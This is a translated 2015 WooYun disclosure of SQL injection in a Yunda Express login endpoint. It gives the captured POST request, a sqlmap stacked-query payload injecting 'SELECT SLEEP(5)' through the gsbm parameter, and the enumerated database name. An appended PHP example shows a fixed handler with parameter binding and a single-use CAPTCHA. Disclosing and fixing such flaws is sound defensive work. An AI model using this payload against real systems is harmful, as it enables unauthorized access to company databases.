
Vulnerability summary

Defect ID: wooyun-2015-090335

Title: SQL injection in a Yunda Express (韵达快递) system, various databases leaked again (patching only where pointed)~

Affected vendor: Yunda Express (韵达快递)

Author: 小饼仔

Submitted: 2015-01-06 18:37

Fixed: 2015-02-20 18:38

Published: 2015-02-20 18:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-06: Details sent to the vendor, awaiting vendor handling
2015-01-07: Vendor confirmed; details visible to the vendor only
2015-01-17: Details opened to core white hats and relevant domain experts
2015-01-27: Details opened to regular white hats
2015-02-06: Details opened to intern white hats
2015-02-20: Details opened to the public

Brief description:

Patching only where pointed. Yunda, did you really fix it?

Detailed description:


I clicked in and had a look. There is a page,
http://car.yundasys.com:81/yd_khd/khd_add.php
which was accessible without authentication and allowed arbitrary file upload. The vendor did fix that one: it now redirects to the login page.



At the login form I habitually typed a single quote and clicked login. Nothing happened on screen, but capturing the request showed a 500 error, so it looked promising.



I then entered random usernames and passwords and resubmitted several times. Each attempt returned "wrong username or password", and the CAPTCHA could be reused.
POST request:

POST /yd_khd/login_ajax.php HTTP/1.1
Host: car.yundasys.com:81
Proxy-Connection: keep-alive
Content-Length: 58
Accept: */*
Origin: http://car.yundasys.com:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://car.yundasys.com:81/yd_khd/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: theme=1; PHPSESSID=uml5sm1q4mv2of8b0r6b9orqo2
RA-Ver: 2.8.6
RA-Sid: 65E7C870-20141208-023412-580933-2bd67e
lb=0&sign=login&gsbm=aaa&password=aaaa&v_code1=6657&sb_gs=


Proof of vulnerability:

Fed it to sqlmap:

---
Place: POST
Parameter: gsbm
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: lb=0&sign=login&gsbm=aaa'; SELECT SLEEP(5)-- &password=aaa&v_code1=9122&sb_gs=
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0.11
current database: 'ydserver'
Database: ydserver
[139 tables]


OK, as for the impact, see the earlier report WooYun: 韵达某处任意文件上传导致各种数据库侧漏(疑似各种韵达系统数据库) (arbitrary file upload on a Yunda system leaks various databases, apparently those of several Yunda systems) and you will get the picture; I won't go any deeper.

Fix recommendation:

Don't just patch where you're pointed!

Copyright notice: reprints must credit the source, 小饼仔@乌云
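As an added illustration (not the vendor's login_ajax.php, which the report does not show), here is what a login handler shaped like the one above looks like once the `gsbm` parameter is bound instead of spliced into SQL, so the stacked-query payload from the sqlmap output is compared as a literal string, and once the CAPTCHA is discarded after a single check so it cannot be replayed. The table and column names, the connection credentials and a modern PHP release are assumptions (the target ran PHP 5.3.3); the database name comes from the sqlmap output.

```php
<?php
// Added example, not the vendor's login_ajax.php (which the report does not show).
// Assumptions: a modern PHP release, a table `accounts(id, gsbm, password_hash)`
// and the connection credentials; the database name comes from the sqlmap output.
session_start();
header('Content-Type: application/json; charset=utf-8');
// Check the CAPTCHA and invalidate it in the same step: the report found the
// code could be reused, which turns one solved CAPTCHA into unlimited attempts.
function captchaValid(string $submitted): bool
{
    if (empty($_SESSION['v_code'])) {
        return false;
    }
    $ok = hash_equals((string) $_SESSION['v_code'], $submitted);
    unset($_SESSION['v_code']);          // single use, whether or not it matched
    return $ok;
}
// Bind gsbm as a parameter instead of concatenating it into the query text, so
// a value such as  aaa'; SELECT SLEEP(5)--  is compared as a literal string.
function findAccount(PDO $db, string $gsbm): ?array
{
    $stmt = $db->prepare('SELECT id, password_hash FROM accounts WHERE gsbm = ?');
    $stmt->execute([$gsbm]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
$db = new PDO('mysql:host=127.0.0.1;dbname=ydserver;charset=utf8mb4', 'app_user', 'PLACEHOLDER', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // server-side prepares: one statement per call
]);
$gsbm     = (string) ($_POST['gsbm']     ?? '');
$password = (string) ($_POST['password'] ?? '');
$code     = (string) ($_POST['v_code1']  ?? '');
if (!captchaValid($code)) {
    echo json_encode(['ok' => false, 'msg' => 'captcha']);
    exit;
}
$acct = findAccount($db, $gsbm);
// One generic failure message whether the account or the password is wrong.
if ($acct === null || !password_verify($password, $acct['password_hash'])) {
    echo json_encode(['ok' => false, 'msg' => 'bad credentials']);
    exit;
}
session_regenerate_id(true);
$_SESSION['uid'] = $acct['id'];
echo json_encode(['ok' => true]);
```

The 500 response the author triggered with a single quote is the other thing to watch for: with ERRMODE_EXCEPTION, database errors should be caught and logged server-side, not left to surface as a distinguishable status code.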


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-01-07 09:42

Vendor reply:

Fixed, thanks.

Latest status:

None